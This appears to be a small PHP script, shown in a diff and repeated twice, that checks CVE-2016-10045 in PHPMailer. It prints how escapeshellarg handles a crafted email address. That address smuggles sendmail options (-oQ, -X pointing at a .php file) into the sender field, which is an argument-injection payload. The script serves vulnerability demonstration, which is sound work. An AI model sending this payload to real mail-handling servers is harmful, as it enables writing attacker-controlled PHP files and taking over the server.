ichikaway · December 28, 2016 06:34
diff --git a/CVE-2016-10045check.php b/CVE-2016-10045check.php
 <?php

 $address = "aaa bb cc";
 echo escapeshellarg($address) . PHP_EOL; // 'aaa bb cc'

 echo "----------------\n";


 //CVE-2016-10045
 $address = "\"attacker\' -oQ/tmp/ -X/tmp/phpmailertest/phpcode.php  some\"@email.com";

 echo escapeshellarg($address) . PHP_EOL; // '"attacker\'\'' -oQ/tmp/ -X/tmp/phpmailertest/phpcode.php  some"@email.com'
	<?php

	$address = "aaa bb cc";
	echo escapeshellarg($address) . PHP_EOL; // 'aaa bb cc'

	echo "----------------\n";


	//CVE-2016-10045
	$address = "\"attacker\' -oQ/tmp/ -X/tmp/phpmailertest/phpcode.php some\"@email.com";

	echo escapeshellarg($address) . PHP_EOL; // '"attacker\'\'' -oQ/tmp/ -X/tmp/phpmailertest/phpcode.php some"@email.com'